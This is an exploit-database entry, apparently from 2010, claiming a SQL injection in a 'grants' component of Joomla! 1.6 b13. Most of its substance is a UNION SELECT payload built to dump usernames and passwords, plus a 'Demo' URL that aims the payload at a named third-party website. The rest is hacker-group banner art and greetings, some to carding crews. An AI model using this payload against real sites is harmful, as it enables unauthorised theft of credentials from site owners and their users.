Joomla Component Joomla! 1.6 b13 grants SQL Injection

2010-11-16
ID: 65225
CVE: None
Download vulnerable application: None
[+]Title :  

[+]Software  : Joomla! 1.6 b13

[+]Vendor  : http://joomla.en.softonic.com/

[+]Download : http://joomla.en.softonic.com/download

[+]Author : jos_ali_joe

[+]Contact : josalijoe[at]yahoo[dot]com

[+]Home  : http://josalijoe.wordpress.com/





1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      1

0  [+] Site            : Inj3ct0r.com                                  0

1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1

0                                                                      0

1                    ##########################################        1

0                    I'm jos_ali_joe  member from Inj3ct0r Team        1

1                    ##########################################        0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



########################################################################



Dork : inurl:[ jos_ali_joe ] 



########################################################################



##################################################################################

Sql Exploit

Exploit :



/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/group_concat(username,0x3a,password) from user--

Demo  :



http://www.mtdc.com.my/index.php?page=grants/index&mod=3/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/group_concat%28username,0x3a,password%29%20from%20user--

 

##################################################################################





Greets For :



./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub



./Byroe Net - Yogya Carderlink - Wannabe Hacker - anten4 - Security Reason - Packetstorm Security



My Team : ./Indonesian Coder & inj3ct0r



Special Thanks :



/. paraghcyber.net



[+] Note : 



Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 

Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 

Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.
1-4-2 (www01)